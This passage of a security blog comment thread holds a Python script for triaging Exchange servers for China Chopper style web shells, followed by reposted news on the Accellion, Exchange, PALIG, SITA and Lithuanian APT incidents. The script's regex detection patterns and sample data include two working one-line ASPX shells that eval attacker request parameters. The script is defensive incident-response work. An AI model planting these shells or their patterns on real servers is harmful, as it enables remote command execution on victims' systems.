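# Content typical of one-line ASPX shells (China Chopper style): server
# side script that evaluates or executes attacker-supplied request data.
SHELL_PATTERNS = (
    re.compile(r'eval\s*\(\s*Request\s*[\[.]', re.I),
    re.compile(r'runat\s*=\s*"server".*?Request\s*\[', re.I | re.S),
    re.compile(r'Page_Load.*?Request\s*\[', re.I | re.S),
    re.compile(r'ProcessStartInfo', re.I),
)


@dataclass
class WebFile:
    path: str            # path as seen on the server
    mtime: datetime      # last modification time (UTC)
    content: str         # file contents as text


def _norm(path):
    return path.replace("\\", "/").lower()


def in_watched_dir(path):
    p = _norm(path)
    return any(d in p for d in WATCHED_DIRS)


def suspicious_content(text):
    """Return the patterns that match, empty list if none."""
    return [pat.pattern for pat in SHELL_PATTERNS if pat.search(text)]


def triage(files, since):
    """Return [(path, [reasons])] for .aspx files that deserve a look.

    `since` is the start of the window of interest; a file modified
    after it in a watched directory is flagged even without a content
    match, because patching alone does not remove an already dropped shell.
    """
    findings = []
    for f in files:
        if not f.path.lower().endswith(".aspx") or not in_watched_dir(f.path):
            continue
        reasons = []
        if any(d in _norm(f.path) for d in NO_ASPX_EXPECTED):
            reasons.append("aspx page in a directory that should contain none")
        if f.mtime >= since:
            reasons.append("modified inside the attack window")
        hits = suspicious_content(f.content)
        if hits:
            reasons.append("shell-like content: " + "; ".join(hits))
        if reasons:
            findings.append((f.path, reasons))
    return findings


# Constructed sample: one China Chopper style shell, one legitimate
# logon page, one renamed shell next to the real error page.
SAMPLE_FILES = [
    WebFile(r"C:\inetpub\wwwroot\aspnet_client\system_web\supp0rt.aspx",
            datetime(2021, 3, 1, tzinfo=timezone.utc),
            '<script language="JScript" runat="server">'
            'function Page_Load(){eval(Request["orange"],"unsafe");}</script>'),
    WebFile(r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",
            datetime(2020, 12, 1, tzinfo=timezone.utc),
            '<%@ Page language="C#" AutoEventWireup="true" %>'),
    WebFile(r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx",
            datetime(2021, 3, 3, tzinfo=timezone.utc),
            '<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["pass"],"unsafe"));%>'),
]

# Late February 2021, when exploitation broadened (assumed window start).
ATTACK_WINDOW_START = datetime(2021, 2, 26, tzinfo=timezone.utc)


def run_sample():
    return triage(SAMPLE_FILES, ATTACK_WINDOW_START)


if __name__ == "__main__":
    for path, reasons in run_sample():
        print(path)
        for r in reasons:
            print("   -", r)
```

    Content matching catches shells regardless of name, while the directory and modification-time checks catch shells that use a different template; a hit on either is a reason to pull the file and the surrounding IIS logs before trusting the box again.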
  41. Tomi Engdahl says:

    The Accellion Breach Keeps Getting Worse and More Expensive
    https://www.wired.com/story/accellion-breach-victims-extortion/
    The drumbeat of data breach disclosures is unrelenting, with new
    organizations chiming in all the time. But a series of breaches in
    December and January that have come to light in recent weeks has
    quietly provided an object lesson in how bad things can get when
    hackers find an inroad to dozens of potential targets and they’re out
    for profit. Firewall vendor Accellion quietly released a patch in late
    December, and then more fixes in January, to address a cluster of
    vulnerabilities in one of its network equipment offerings.

    Reply
  42. Tomi Engdahl says:

    Microsoft Server Hack Has Victims Hustling to Stop Intruders
    https://www.securityweek.com/microsoft-server-hack-has-victims-hustling-stop-intruders

    Victims of a massive global hack of Microsoft email server software — estimated in the tens of thousands by cybersecurity responders — hustled Monday to shore up infected systems and try to diminish chances that intruders might steal data or hobble their networks.

    The White House has called the hack an “active threat” and said senior national security officials were addressing it.

    The breach was discovered in early January and attributed to Chinese cyber spies targeting U.S. policy think tanks. Then in late February, five days before Microsoft issued a patch on March 2, there was an explosion of infiltrations by other intruders, piggybacking on the initial breach. Victims run the spectrum of organizations that run email servers, from mom-and-pop retailers to law firms, municipal governments, healthcare providers and manufacturers.

    While the hack doesn’t pose the kind of national security threat as the more sophisticated SolarWinds campaign, which the Biden administration blames on Russian intelligence officers, it can be an existential threat for victims who didn’t install the patch in time and now have hackers lingering in their systems. The hack poses a new challenge for the White House, which even as it prepares to respond to the SolarWinds breach, must now grapple with a formidable and very different threat from China.

    “I would say it’s a serious economic security threat because so many small companies out there can literally have their business destroyed through a targeted ransomware attack,” said Dmitri Alperovitch, former chief technical officer of the cybersecurity firm CrowdStrike.

    Reply
  43. Tomi Engdahl says:

    Disruptions at Pan-American Life Likely Caused by Ransomware Attack
    https://www.securityweek.com/disruptions-pan-american-life-likely-caused-ransomware-attack

    Recent service disruptions at the Pan-American Life Insurance Group (PALIG) were likely caused by a cyberattack conducted by a threat actor known for using the REvil ransomware.

    New Orleans-based PALIG provides life, accident and health insurance services across the Americas. The group has more than 20 member companies and employs roughly 2,000 people worldwide.

    The official website of PALIG (palig.com) currently only displays some contact information and the following message: “Pan-American Life Insurance Group is currently experiencing a disruption to some of our services and we are working to restore them. To facilitate communication during this time, we have created temporary email accounts as an official communication channel.”

    Reply
  44. Tomi Engdahl says:

    Multiple Airlines Impacted by Data Breach at Aviation IT Firm SITA
    https://www.securityweek.com/multiple-airlines-impacted-data-breach-aviation-it-firm-sita

    SITA, a multinational company that specializes in air transport communications and IT, this week confirmed falling victim to a cyberattack that appears to have impacted multiple airlines around the world.

    SITA said on Thursday that the attack, which it described as “highly sophisticated,” affected certain passenger data stored on servers of SITA Passenger Service System (PSS) Inc., which operates passenger processing systems for airlines.

    “After confirmation of the seriousness of the data security incident on February 24, 2021, SITA took immediate action to contact affected SITA PSS customers and all related organizations,” the company said in a statement.

    https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/

    Reply
  45. Tomi Engdahl says:

    Report: Russian Hackers Exploit Lithuanian Infrastructure
    https://www.securityweek.com/report-russian-hackers-exploit-lithuanian-infrastructure

    Hacker groups linked to Russian intelligence conducted cyber-attacks against top Lithuanian officials and decision-makers last year and used the Baltic nation’s technology infrastructure as a base to hit targets elsewhere, a report by Lithuania’s intelligence service said Thursday.

    The annual national security threat assessment report claimed that, among others, the Russian cyber-espionage group APT29 with alleged links to Russia’s intelligence services “exploited” Lithuania’s information technology infrastructure “to carry out attacks by APT29 against foreign entities developing a COVID-19 vaccine.”

    Reply
